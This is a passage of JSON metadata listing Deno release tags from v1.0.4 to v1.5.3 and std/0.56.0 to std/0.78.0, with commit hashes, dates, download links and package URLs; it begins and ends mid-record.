.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v